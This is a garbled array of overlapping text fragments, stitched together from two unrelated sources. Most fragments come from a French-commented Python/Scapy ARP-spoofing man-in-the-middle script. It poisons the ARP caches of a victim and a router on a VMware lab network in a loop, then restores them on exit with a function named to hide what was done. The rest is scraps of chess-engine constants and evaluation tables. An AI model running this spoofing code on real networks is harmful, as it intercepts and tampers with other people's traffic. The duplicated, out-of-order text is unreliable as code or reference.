à broadcaster sur le réseau.", "ARP qui dit à la victime qu'il doit maintenant discuter avec le routeur", "hwsrc (qui est la nôtre en fait) en l'envoyeant bien à l'adresse MAC", "qu'il faut qu'ils reparlent entre eux. # (ici on crie au sens de,", "print(\"[+] Le cyanure va être déposé sur le réseau (MAC adresses obtenues)\") while", "sont deux paquets (p1, p2). p1 est un paquet ARP qui dit au", "= routeur et victim = victime. La paire retournée sont deux paquets (p1,", "hwsrc: ARP(op=2, pdst=pdst, psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc) return build(gate_ip, victim_ip, victim_mac), build(victim_ip, gate_ip, gate_mac)", "le routeur et nous on quitte la scène. \"\"\" gate_mac, gate_ip = gate_info", "Exception as e: print(e) print(\"[!] Impossible de trouver l'adresse MAC de la cible,", "= get_mac(gate_ip) except Exception: print(\"[!] Impossible de trouver l'adresse MAC du routeur, échec", "gate_ip, gate_mac) def make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration des caches ARP des cibles\") victim_mac =", "pour lui dire que `psrc` a pour adresse MAC `hwsrc` build = lambda", "routeur et nous on quitte la scène. \"\"\" gate_mac, gate_ip = gate_info victim_mac,", "\"\"\" ans, unans = srp( Ether(dst=BROADCAST)/ARP(pdst=ip), # un paquet ARP à broadcaster sur", "# i.e. on reconnecte le routeur et la victime entre eux. for_gate, for_victim", "sûr qu'ils le reçoivent.) send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm, vm): \"\"\" Fourberie de Scapy", "vm): \"\"\" Fourberie de Scapy n°1. \"\"\" for pdst, psrc, hwdst in ((victim_ip,", "de Scapy n°1. \"\"\" for pdst, psrc, hwdst in ((victim_ip, gate_ip, vm), (gate_ip,", "destination de `pdst` pour lui dire que `psrc` a pour adresse MAC `hwsrc`", "Crée une paire de paquets ARP où gate = routeur et victim =", "l'attaque\") print(\"[+] Le cyanure va être déposé sur le réseau (MAC adresses obtenues)\")", "pdst=pdst, psrc=psrc, hwdst=hwdst) # Faisons croire à pdst que psrc est à l'adresse", "hwdst en réalité. ) def mitm(): try: victim_mac = get_mac(victim_ip) except Exception as", "7 fois le paquet pour être sûr qu'ils le reçoivent.) send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def", "l'envoyeant bien à l'adresse MAC hwdst en réalité. ) def mitm(): try: victim_mac", "de la réponse reçue. return rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info, victim_info): \"\"\" Crée une paire", "réseau (MAC adresses obtenues)\") while True: try: trick_them(gate_mac, victim_mac) time.sleep(1.5) except KeyboardInterrupt: make_them_think_we_didnt_do_something_bad()", "et victim = victime. La paire retournée sont deux paquets (p1, p2). p1", "ARP à broadcaster sur le réseau. timeout=2, # timeout qu'on attend avant une", "`hwsrc` build = lambda pdst, psrc, hwsrc: ARP(op=2, pdst=pdst, psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc) return", "l'adresse MAC associée à l'IP par une requête ARP. \"\"\" ans, unans =", "= victim_info # build construit un paquet ARP à destination de `pdst` pour", "Restauration des caches ARP des cibles\") victim_mac = get_mac(victim_ip) gate_mac = get_mac(gate_ip) #", "gate_mac = get_mac(gate_ip) except Exception: print(\"[!] Impossible de trouver l'adresse MAC du routeur,", "n°1. \"\"\" for pdst, psrc, hwdst in ((victim_ip, gate_ip, vm), (gate_ip, victim_ip, gm)):", "On itère sur les couples (envoyés, reçus) des answers (réponses). for snd, rcv", "paquet ARP qui dit à la victime qu'il doit maintenant discuter avec le", "on l'envoie mais on CRIE sur le réseau qu'il faut qu'ils reparlent entre", "for pdst, psrc, hwdst in ((victim_ip, gate_ip, vm), (gate_ip, victim_ip, gm)): send( ARP(op=2,", "attend avant une réponse en secondes. iface=interface, # interface réseau (ici vmnet1 le", "VMware) inter=0.1) # intervalle entre deux paquets. # On itère sur les couples", "de trouver l'adresse MAC de la cible, échec de l'attaque\") return try: gate_mac", "eux. # (ici on crie au sens de, on envoie 7 fois le", "sur le réseau. timeout=2, # timeout qu'on attend avant une réponse en secondes.", "dit à la victime qu'il doit maintenant discuter avec le routeur et nous", "\"\"\" Récupère l'adresse MAC associée à l'IP par une requête ARP. \"\"\" ans,", "for_gate, for_victim = build_arp_pair_packets((gate_mac, gate_ip), (victim_mac, victim_ip)) for pkt in (for_gate, for_victim): #", "déposé sur le réseau (MAC adresses obtenues)\") while True: try: trick_them(gate_mac, victim_mac) time.sleep(1.5)", "lambda pdst, psrc, hwsrc: ARP(op=2, pdst=pdst, psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc) return build(gate_ip, victim_ip, victim_mac),", "get_mac(victim_ip) gate_mac = get_mac(gate_ip) # On construit notre paire de restauration. # i.e.", "des answers (réponses). for snd, rcv in ans: # On renvoie l'adresse MAC", "sens de, on envoie 7 fois le paquet pour être sûr qu'ils le", "gate_mac) def make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration des caches ARP des cibles\") victim_mac = get_mac(victim_ip)", "rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info, victim_info): \"\"\" Crée une paire de paquets ARP où gate", "BROADCAST = \"FF:FF:FF:FF:FF:FF\" HOW_MUCH_TO_SPAM_PPL = 7 victim_ip = \"192.168.79.129\" gate_ip = \"192.168.79.254\" interface", "scapy.all import * BROADCAST = \"FF:FF:FF:FF:FF:FF\" HOW_MUCH_TO_SPAM_PPL = 7 victim_ip = \"192.168.79.129\" gate_ip", "in ((victim_ip, gate_ip, vm), (gate_ip, victim_ip, gm)): send( ARP(op=2, pdst=pdst, psrc=psrc, hwdst=hwdst) #", "reparlent entre eux. # (ici on crie au sens de, on envoie 7", "réseau qu'il faut qu'ils reparlent entre eux. # (ici on crie au sens", "gm)): send( ARP(op=2, pdst=pdst, psrc=psrc, hwdst=hwdst) # Faisons croire à pdst que psrc", "nous on quitte la scène. \"\"\" gate_mac, gate_ip = gate_info victim_mac, victim_ip =", "retournée sont deux paquets (p1, p2). p1 est un paquet ARP qui dit", "du routeur, échec de l'attaque\") print(\"[+] Le cyanure va être déposé sur le", "def build_arp_pair_packets(gate_info, victim_info): \"\"\" Crée une paire de paquets ARP où gate =", "(gate_ip, victim_ip, gm)): send( ARP(op=2, pdst=pdst, psrc=psrc, hwdst=hwdst) # Faisons croire à pdst", "# On renvoie l'adresse MAC de la réponse reçue. return rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info,", "# interface réseau (ici vmnet1 le réseau interne de VMware) inter=0.1) # intervalle", "psrc est à l'adresse MAC hwsrc (qui est la nôtre en fait) en", "en réalité. ) def mitm(): try: victim_mac = get_mac(victim_ip) except Exception as e:", "est un paquet ARP qui dit au routeur qu'il doit s'occuper de la", "= \"FF:FF:FF:FF:FF:FF\" HOW_MUCH_TO_SPAM_PPL = 7 victim_ip = \"192.168.79.129\" gate_ip = \"192.168.79.254\" interface =", "for snd, rcv in ans: # On renvoie l'adresse MAC de la réponse", "from scapy.all import * BROADCAST = \"FF:FF:FF:FF:FF:FF\" HOW_MUCH_TO_SPAM_PPL = 7 victim_ip = \"192.168.79.129\"", "victim_mac = get_mac(victim_ip) gate_mac = get_mac(gate_ip) # On construit notre paire de restauration.", "victime entre eux. for_gate, for_victim = build_arp_pair_packets((gate_mac, gate_ip), (victim_mac, victim_ip)) for pkt in", "entre eux. for_gate, for_victim = build_arp_pair_packets((gate_mac, gate_ip), (victim_mac, victim_ip)) for pkt in (for_gate,", "on quitte la scène. \"\"\" gate_mac, gate_ip = gate_info victim_mac, victim_ip = victim_info", "la victime. p2 est un paquet ARP qui dit à la victime qu'il", "ans, unans = srp( Ether(dst=BROADCAST)/ARP(pdst=ip), # un paquet ARP à broadcaster sur le", "victime. p2 est un paquet ARP qui dit à la victime qu'il doit", "routeur et la victime entre eux. for_gate, for_victim = build_arp_pair_packets((gate_mac, gate_ip), (victim_mac, victim_ip))", "l'adresse MAC de la cible, échec de l'attaque\") return try: gate_mac = get_mac(gate_ip)", "à destination de `pdst` pour lui dire que `psrc` a pour adresse MAC", "(victim_mac, victim_ip)) for pkt in (for_gate, for_victim): # Surtout, on l'envoie mais on", "paire de restauration. # i.e. on reconnecte le routeur et la victime entre", "interface réseau (ici vmnet1 le réseau interne de VMware) inter=0.1) # intervalle entre", "p2). p1 est un paquet ARP qui dit au routeur qu'il doit s'occuper", "va être déposé sur le réseau (MAC adresses obtenues)\") while True: try: trick_them(gate_mac,", "vmnet1 le réseau interne de VMware) inter=0.1) # intervalle entre deux paquets. #", "par une requête ARP. \"\"\" ans, unans = srp( Ether(dst=BROADCAST)/ARP(pdst=ip), # un paquet", "à l'adresse MAC hwdst en réalité. ) def mitm(): try: victim_mac = get_mac(victim_ip)", "lui dire que `psrc` a pour adresse MAC `hwsrc` build = lambda pdst,", "build = lambda pdst, psrc, hwsrc: ARP(op=2, pdst=pdst, psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc) return build(gate_ip,", "send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm, vm): \"\"\" Fourberie de Scapy n°1. \"\"\" for pdst,", "# Faisons croire à pdst que psrc est à l'adresse MAC hwsrc (qui", "le paquet pour être sûr qu'ils le reçoivent.) send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm, vm):", "send( ARP(op=2, pdst=pdst, psrc=psrc, hwdst=hwdst) # Faisons croire à pdst que psrc est", "routeur, échec de l'attaque\") print(\"[+] Le cyanure va être déposé sur le réseau", "le reçoivent.) send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm, vm): \"\"\" Fourberie de Scapy n°1. \"\"\"", "dit au routeur qu'il doit s'occuper de la victime. p2 est un paquet", "Surtout, on l'envoie mais on CRIE sur le réseau qu'il faut qu'ils reparlent", "def make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration des caches ARP des cibles\") victim_mac = get_mac(victim_ip) gate_mac", "sur les couples (envoyés, reçus) des answers (réponses). for snd, rcv in ans:", "broadcaster sur le réseau. timeout=2, # timeout qu'on attend avant une réponse en", "trouver l'adresse MAC du routeur, échec de l'attaque\") print(\"[+] Le cyanure va être", "mais on CRIE sur le réseau qu'il faut qu'ils reparlent entre eux. #", "trick_them(gm, vm): \"\"\" Fourberie de Scapy n°1. \"\"\" for pdst, psrc, hwdst in", "print(\"[+] Restauration des caches ARP des cibles\") victim_mac = get_mac(victim_ip) gate_mac = get_mac(gate_ip)", "le réseau interne de VMware) inter=0.1) # intervalle entre deux paquets. # On", "build_arp_pair_packets(gate_info, victim_info): \"\"\" Crée une paire de paquets ARP où gate = routeur", "\"\"\" gate_mac, gate_ip = gate_info victim_mac, victim_ip = victim_info # build construit un", "= lambda pdst, psrc, hwsrc: ARP(op=2, pdst=pdst, psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc) return build(gate_ip, victim_ip,", "échec de l'attaque\") print(\"[+] Le cyanure va être déposé sur le réseau (MAC", "on CRIE sur le réseau qu'il faut qu'ils reparlent entre eux. # (ici", "l'adresse MAC du routeur, échec de l'attaque\") print(\"[+] Le cyanure va être déposé", "= 7 victim_ip = \"192.168.79.129\" gate_ip = \"192.168.79.254\" interface = 'vmnet1' def get_mac(ip):", "fait) en l'envoyeant bien à l'adresse MAC hwdst en réalité. ) def mitm():", "get_mac(ip): \"\"\" Récupère l'adresse MAC associée à l'IP par une requête ARP. \"\"\"", "de trouver l'adresse MAC du routeur, échec de l'attaque\") print(\"[+] Le cyanure va", "victime qu'il doit maintenant discuter avec le routeur et nous on quitte la", "psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc) return build(gate_ip, victim_ip, victim_mac), build(victim_ip, gate_ip, gate_mac) def make_them_think_we_didnt_do_something_bad(): print(\"[+]", "fois le paquet pour être sûr qu'ils le reçoivent.) send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm,", "paquets (p1, p2). p1 est un paquet ARP qui dit au routeur qu'il", "et nous on quitte la scène. \"\"\" gate_mac, gate_ip = gate_info victim_mac, victim_ip", "(for_gate, for_victim): # Surtout, on l'envoie mais on CRIE sur le réseau qu'il", "qu'on attend avant une réponse en secondes. iface=interface, # interface réseau (ici vmnet1", "un paquet ARP qui dit à la victime qu'il doit maintenant discuter avec", ") def mitm(): try: victim_mac = get_mac(victim_ip) except Exception as e: print(e) print(\"[!]", "la victime qu'il doit maintenant discuter avec le routeur et nous on quitte", "\"\"\" Fourberie de Scapy n°1. \"\"\" for pdst, psrc, hwdst in ((victim_ip, gate_ip,", "trouver l'adresse MAC de la cible, échec de l'attaque\") return try: gate_mac =", "qui dit au routeur qu'il doit s'occuper de la victime. p2 est un", "un paquet ARP à broadcaster sur le réseau. timeout=2, # timeout qu'on attend", "réseau (ici vmnet1 le réseau interne de VMware) inter=0.1) # intervalle entre deux", "ARP(op=2, pdst=pdst, psrc=psrc, hwdst=hwdst) # Faisons croire à pdst que psrc est à", "ARP(op=2, pdst=pdst, psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc) return build(gate_ip, victim_ip, victim_mac), build(victim_ip, gate_ip, gate_mac) def", "= 'vmnet1' def get_mac(ip): \"\"\" Récupère l'adresse MAC associée à l'IP par une", "victim = victime. La paire retournée sont deux paquets (p1, p2). p1 est", "deux paquets (p1, p2). p1 est un paquet ARP qui dit au routeur", "on crie au sens de, on envoie 7 fois le paquet pour être", "qu'ils le reçoivent.) send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm, vm): \"\"\" Fourberie de Scapy n°1.", "scène. \"\"\" gate_mac, gate_ip = gate_info victim_mac, victim_ip = victim_info # build construit", "return rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info, victim_info): \"\"\" Crée une paire de paquets ARP où", "réseau interne de VMware) inter=0.1) # intervalle entre deux paquets. # On itère", "s'occuper de la victime. p2 est un paquet ARP qui dit à la", "while True: try: trick_them(gate_mac, victim_mac) time.sleep(1.5) except KeyboardInterrupt: make_them_think_we_didnt_do_something_bad() break if __name__ ==", "à l'IP par une requête ARP. \"\"\" ans, unans = srp( Ether(dst=BROADCAST)/ARP(pdst=ip), #", "au routeur qu'il doit s'occuper de la victime. p2 est un paquet ARP", "en fait) en l'envoyeant bien à l'adresse MAC hwdst en réalité. ) def", "une requête ARP. \"\"\" ans, unans = srp( Ether(dst=BROADCAST)/ARP(pdst=ip), # un paquet ARP", "Exception: print(\"[!] Impossible de trouver l'adresse MAC du routeur, échec de l'attaque\") print(\"[+]", "faut qu'ils reparlent entre eux. # (ici on crie au sens de, on", "reçus) des answers (réponses). for snd, rcv in ans: # On renvoie l'adresse", "l'IP par une requête ARP. \"\"\" ans, unans = srp( Ether(dst=BROADCAST)/ARP(pdst=ip), # un", "timeout qu'on attend avant une réponse en secondes. iface=interface, # interface réseau (ici", "est un paquet ARP qui dit à la victime qu'il doit maintenant discuter", "adresses obtenues)\") while True: try: trick_them(gate_mac, victim_mac) time.sleep(1.5) except KeyboardInterrupt: make_them_think_we_didnt_do_something_bad() break if", "réponse en secondes. iface=interface, # interface réseau (ici vmnet1 le réseau interne de", "# intervalle entre deux paquets. # On itère sur les couples (envoyés, reçus)", "pdst que psrc est à l'adresse MAC hwsrc (qui est la nôtre en", "être déposé sur le réseau (MAC adresses obtenues)\") while True: try: trick_them(gate_mac, victim_mac)", "count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm, vm): \"\"\" Fourberie de Scapy n°1. \"\"\" for pdst, psrc,", "une réponse en secondes. iface=interface, # interface réseau (ici vmnet1 le réseau interne", "make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration des caches ARP des cibles\") victim_mac = get_mac(victim_ip) gate_mac =", "des cibles\") victim_mac = get_mac(victim_ip) gate_mac = get_mac(gate_ip) # On construit notre paire", "7 victim_ip = \"192.168.79.129\" gate_ip = \"192.168.79.254\" interface = 'vmnet1' def get_mac(ip): \"\"\"", "de `pdst` pour lui dire que `psrc` a pour adresse MAC `hwsrc` build", "MAC du routeur, échec de l'attaque\") print(\"[+] Le cyanure va être déposé sur", "est à l'adresse MAC hwsrc (qui est la nôtre en fait) en l'envoyeant", "print(\"[!] Impossible de trouver l'adresse MAC de la cible, échec de l'attaque\") return", "un paquet ARP qui dit au routeur qu'il doit s'occuper de la victime.", "(réponses). for snd, rcv in ans: # On renvoie l'adresse MAC de la", "print(e) print(\"[!] Impossible de trouver l'adresse MAC de la cible, échec de l'attaque\")", "réponse reçue. return rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info, victim_info): \"\"\" Crée une paire de paquets", "build construit un paquet ARP à destination de `pdst` pour lui dire que", "l'attaque\") return try: gate_mac = get_mac(gate_ip) except Exception: print(\"[!] Impossible de trouver l'adresse", "à pdst que psrc est à l'adresse MAC hwsrc (qui est la nôtre", "MAC de la cible, échec de l'attaque\") return try: gate_mac = get_mac(gate_ip) except", "victim_ip, victim_mac), build(victim_ip, gate_ip, gate_mac) def make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration des caches ARP des", "sur le réseau (MAC adresses obtenues)\") while True: try: trick_them(gate_mac, victim_mac) time.sleep(1.5) except", "la victime entre eux. for_gate, for_victim = build_arp_pair_packets((gate_mac, gate_ip), (victim_mac, victim_ip)) for pkt", "hwdst=BROADCAST, hwsrc=hwsrc) return build(gate_ip, victim_ip, victim_mac), build(victim_ip, gate_ip, gate_mac) def make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration", "le réseau. timeout=2, # timeout qu'on attend avant une réponse en secondes. iface=interface,", "psrc=psrc, hwdst=hwdst) # Faisons croire à pdst que psrc est à l'adresse MAC", "en l'envoyeant bien à l'adresse MAC hwdst en réalité. ) def mitm(): try:", "secondes. iface=interface, # interface réseau (ici vmnet1 le réseau interne de VMware) inter=0.1)", "for pkt in (for_gate, for_victim): # Surtout, on l'envoie mais on CRIE sur", "que `psrc` a pour adresse MAC `hwsrc` build = lambda pdst, psrc, hwsrc:", "= get_mac(victim_ip) except Exception as e: print(e) print(\"[!] Impossible de trouver l'adresse MAC", "pdst, psrc, hwsrc: ARP(op=2, pdst=pdst, psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc) return build(gate_ip, victim_ip, victim_mac), build(victim_ip,", "gate_ip), (victim_mac, victim_ip)) for pkt in (for_gate, for_victim): # Surtout, on l'envoie mais", "eux. for_gate, for_victim = build_arp_pair_packets((gate_mac, gate_ip), (victim_mac, victim_ip)) for pkt in (for_gate, for_victim):", "\"\"\" Crée une paire de paquets ARP où gate = routeur et victim", "mitm(): try: victim_mac = get_mac(victim_ip) except Exception as e: print(e) print(\"[!] Impossible de", "= victime. La paire retournée sont deux paquets (p1, p2). p1 est un", "reconnecte le routeur et la victime entre eux. for_gate, for_victim = build_arp_pair_packets((gate_mac, gate_ip),", "* BROADCAST = \"FF:FF:FF:FF:FF:FF\" HOW_MUCH_TO_SPAM_PPL = 7 victim_ip = \"192.168.79.129\" gate_ip = \"192.168.79.254\"", "ARP où gate = routeur et victim = victime. La paire retournée sont", "= \"192.168.79.129\" gate_ip = \"192.168.79.254\" interface = 'vmnet1' def get_mac(ip): \"\"\" Récupère l'adresse", "def trick_them(gm, vm): \"\"\" Fourberie de Scapy n°1. \"\"\" for pdst, psrc, hwdst", "print(\"[!] Impossible de trouver l'adresse MAC du routeur, échec de l'attaque\") print(\"[+] Le", "un paquet ARP à destination de `pdst` pour lui dire que `psrc` a", "qu'il doit s'occuper de la victime. p2 est un paquet ARP qui dit", "à l'adresse MAC hwsrc (qui est la nôtre en fait) en l'envoyeant bien", "qui dit à la victime qu'il doit maintenant discuter avec le routeur et", "paquet ARP qui dit au routeur qu'il doit s'occuper de la victime. p2", "victime. La paire retournée sont deux paquets (p1, p2). p1 est un paquet", "doit maintenant discuter avec le routeur et nous on quitte la scène. \"\"\"", "pour être sûr qu'ils le reçoivent.) send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm, vm): \"\"\" Fourberie", "l'adresse MAC de la réponse reçue. return rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info, victim_info): \"\"\" Crée", "dire que `psrc` a pour adresse MAC `hwsrc` build = lambda pdst, psrc,", "restauration. # i.e. on reconnecte le routeur et la victime entre eux. for_gate,", "réseau. timeout=2, # timeout qu'on attend avant une réponse en secondes. iface=interface, #", "# On construit notre paire de restauration. # i.e. on reconnecte le routeur", "ARP à destination de `pdst` pour lui dire que `psrc` a pour adresse", "psrc, hwdst in ((victim_ip, gate_ip, vm), (gate_ip, victim_ip, gm)): send( ARP(op=2, pdst=pdst, psrc=psrc,", "\"\"\" for pdst, psrc, hwdst in ((victim_ip, gate_ip, vm), (gate_ip, victim_ip, gm)): send(", "nôtre en fait) en l'envoyeant bien à l'adresse MAC hwdst en réalité. )", "Le cyanure va être déposé sur le réseau (MAC adresses obtenues)\") while True:", "Récupère l'adresse MAC associée à l'IP par une requête ARP. \"\"\" ans, unans", "pdst=pdst, psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc) return build(gate_ip, victim_ip, victim_mac), build(victim_ip, gate_ip, gate_mac) def make_them_think_we_didnt_do_something_bad():", "est la nôtre en fait) en l'envoyeant bien à l'adresse MAC hwdst en", "get_mac(victim_ip) except Exception as e: print(e) print(\"[!] Impossible de trouver l'adresse MAC de", "hwsrc=hwsrc) return build(gate_ip, victim_ip, victim_mac), build(victim_ip, gate_ip, gate_mac) def make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration des", "try: gate_mac = get_mac(gate_ip) except Exception: print(\"[!] Impossible de trouver l'adresse MAC du", "où gate = routeur et victim = victime. La paire retournée sont deux", "doit s'occuper de la victime. p2 est un paquet ARP qui dit à", "pour adresse MAC `hwsrc` build = lambda pdst, psrc, hwsrc: ARP(op=2, pdst=pdst, psrc=psrc,", "((victim_ip, gate_ip, vm), (gate_ip, victim_ip, gm)): send( ARP(op=2, pdst=pdst, psrc=psrc, hwdst=hwdst) # Faisons", "qu'ils reparlent entre eux. # (ici on crie au sens de, on envoie", "le routeur et la victime entre eux. for_gate, for_victim = build_arp_pair_packets((gate_mac, gate_ip), (victim_mac,", "réalité. ) def mitm(): try: victim_mac = get_mac(victim_ip) except Exception as e: print(e)", "gate_mac, gate_ip = gate_info victim_mac, victim_ip = victim_info # build construit un paquet", "Ether(dst=BROADCAST)/ARP(pdst=ip), # un paquet ARP à broadcaster sur le réseau. timeout=2, # timeout", "try: trick_them(gate_mac, victim_mac) time.sleep(1.5) except KeyboardInterrupt: make_them_think_we_didnt_do_something_bad() break if __name__ == '__main__': mitm()", "entre eux. # (ici on crie au sens de, on envoie 7 fois", "reçoivent.) send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm, vm): \"\"\" Fourberie de Scapy n°1. \"\"\" for", "# On itère sur les couples (envoyés, reçus) des answers (réponses). for snd,", "gate_mac = get_mac(gate_ip) # On construit notre paire de restauration. # i.e. on", "\"FF:FF:FF:FF:FF:FF\" HOW_MUCH_TO_SPAM_PPL = 7 victim_ip = \"192.168.79.129\" gate_ip = \"192.168.79.254\" interface = 'vmnet1'", "for_victim): # Surtout, on l'envoie mais on CRIE sur le réseau qu'il faut", "cyanure va être déposé sur le réseau (MAC adresses obtenues)\") while True: try:", "crie au sens de, on envoie 7 fois le paquet pour être sûr", "'vmnet1' def get_mac(ip): \"\"\" Récupère l'adresse MAC associée à l'IP par une requête", "qu'il doit maintenant discuter avec le routeur et nous on quitte la scène.", "la nôtre en fait) en l'envoyeant bien à l'adresse MAC hwdst en réalité.", "def mitm(): try: victim_mac = get_mac(victim_ip) except Exception as e: print(e) print(\"[!] Impossible", "`pdst` pour lui dire que `psrc` a pour adresse MAC `hwsrc` build =", "notre paire de restauration. # i.e. on reconnecte le routeur et la victime", "de l'attaque\") return try: gate_mac = get_mac(gate_ip) except Exception: print(\"[!] Impossible de trouver", "Fourberie de Scapy n°1. \"\"\" for pdst, psrc, hwdst in ((victim_ip, gate_ip, vm),", "requête ARP. \"\"\" ans, unans = srp( Ether(dst=BROADCAST)/ARP(pdst=ip), # un paquet ARP à", "à la victime qu'il doit maintenant discuter avec le routeur et nous on", "MAC hwsrc (qui est la nôtre en fait) en l'envoyeant bien à l'adresse", "p1 est un paquet ARP qui dit au routeur qu'il doit s'occuper de", "victim_mac), build(victim_ip, gate_ip, gate_mac) def make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration des caches ARP des cibles\")", "avant une réponse en secondes. iface=interface, # interface réseau (ici vmnet1 le réseau", "la réponse reçue. return rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info, victim_info): \"\"\" Crée une paire de", "try: victim_mac = get_mac(victim_ip) except Exception as e: print(e) print(\"[!] Impossible de trouver", "maintenant discuter avec le routeur et nous on quitte la scène. \"\"\" gate_mac,", "de VMware) inter=0.1) # intervalle entre deux paquets. # On itère sur les", "avec le routeur et nous on quitte la scène. \"\"\" gate_mac, gate_ip =", "except Exception as e: print(e) print(\"[!] Impossible de trouver l'adresse MAC de la", "de, on envoie 7 fois le paquet pour être sûr qu'ils le reçoivent.)", "ARP des cibles\") victim_mac = get_mac(victim_ip) gate_mac = get_mac(gate_ip) # On construit notre", "MAC hwdst en réalité. ) def mitm(): try: victim_mac = get_mac(victim_ip) except Exception", "caches ARP des cibles\") victim_mac = get_mac(victim_ip) gate_mac = get_mac(gate_ip) # On construit", "on envoie 7 fois le paquet pour être sûr qu'ils le reçoivent.) send(pkt,", "interface = 'vmnet1' def get_mac(ip): \"\"\" Récupère l'adresse MAC associée à l'IP par", "# timeout qu'on attend avant une réponse en secondes. iface=interface, # interface réseau", "(p1, p2). p1 est un paquet ARP qui dit au routeur qu'il doit", "pdst, psrc, hwdst in ((victim_ip, gate_ip, vm), (gate_ip, victim_ip, gm)): send( ARP(op=2, pdst=pdst,", "victim_info # build construit un paquet ARP à destination de `pdst` pour lui", "de la cible, échec de l'attaque\") return try: gate_mac = get_mac(gate_ip) except Exception:", "Impossible de trouver l'adresse MAC de la cible, échec de l'attaque\") return try:" ]
[ "Directions pawns can move: forward 1, forward 2, right (capture), left (capture) PAWN_OFFSETS", "-1.0, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0],", "'e3': 84, 'f3': 85, 'g3': 86, 'h3': 87, 'a2': 96, 'b2': 97, 'c2':", "0, 0, 0, 17, 0, 0, 0, 16, 0, 0, 0, 15, 0,", "118, 'h1': 119 } ROOKS = { 'w': [{'square': SQUARES['a1'], 'flag': BITS['QSIDE_CASTLE']}, {'square':", "0.0, -0.5], [ 0.0, 0.0, 0.0, 0.5, 0.5, 0.0, 0.0, 0.0] ] BISHOP_EVAL", ": 'r', 5 : 'q', 6 : 'k' } MCTS_COLOR_MAP = { 'w'", "0, 0, 0,20, 0, 0, 0, 0, 20, 0, 0, 0, 0, 24,", ": 'n', 3 : 'b', 4 : 'r', 5 : 'q', 6 :", "33, 31, 14], 'b': [-17, -15, 17, 15], 'r': [-16, 1, 16, -1],", "0, 0, 0, 17, 0, 16, 0, 15, 0, 0, 0, 0, 0,", "-1.0, -2.0, -2.0, -2.0, -2.0, -2.0, -2.0, -1.0], [ 2.0, 2.0, 0.0, 0.0,", "left (capture) PAWN_OFFSETS = { 'b': [16, 32, 17, 15], 'w': [-16, -32,", "-2.0, -2.0, -2.0, -2.0, -2.0, -2.0, -1.0], [ 2.0, 2.0, 0.0, 0.0, 0.0,", "0, 0, 0,20, 0, 0, 0, 24, 0, 0, 0,20, 0, 0, 0,", "'flag': BITS['KSIDE_CASTLE']}] } KING_EVAL = [ [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0,", "} MCTS_MAPPING = { 'p' : 1, 'n' : 2, 'b' : 3,", "-1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [", "0, 0, 17, 16, 15, 0, 0, 0, 0, 0, 0, 0, 1,", "0.5, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.0, 0.0,", "-1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0,", "0, 0, 0, 0,20, 0, 0, 20,0, 0, 0, 0, 0, 0, 24,", "'c3': 82, 'd3': 83, 'e3': 84, 'f3': 85, 'g3': 86, 'h3': 87, 'a2':", "0.0, 0.0, -1.0], [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0] ]", "0,20, 0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0, 0, 24,", "'p', 'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE': 'q' } BITS = { 'NORMAL': 1, 'CAPTURE': 2,", "'q' : 5, 'k' : 6, } MCTS_DECODER = { 1 : 'p',", "BITS['KSIDE_CASTLE']}], 'b': [{'square': SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}] } KING_EVAL =", "0.5, 0.0, -1.0], [ -0.5, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [", "5, 'g8': 6, 'h8': 7, 'a7': 16, 'b7': 17, 'c7': 18, 'd7': 19,", "'n': 1, 'b': 2, 'r': 3, 'q': 4, 'k': 5 } FLAGS =", "0, 0, 0, 0, 0, 0,-15, 0,-16, 0,-17, 0, 0, 0, 0, 0,", "[ [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [ 0.5, 1.0,", "-15, 1, 17, 16, 15, -1] } MCTS_MAPPING = { 'p' : 1,", "SHIFTS = { 'p': 0, 'n': 1, 'b': 2, 'r': 3, 'q': 4,", "70, 'h4': 71, 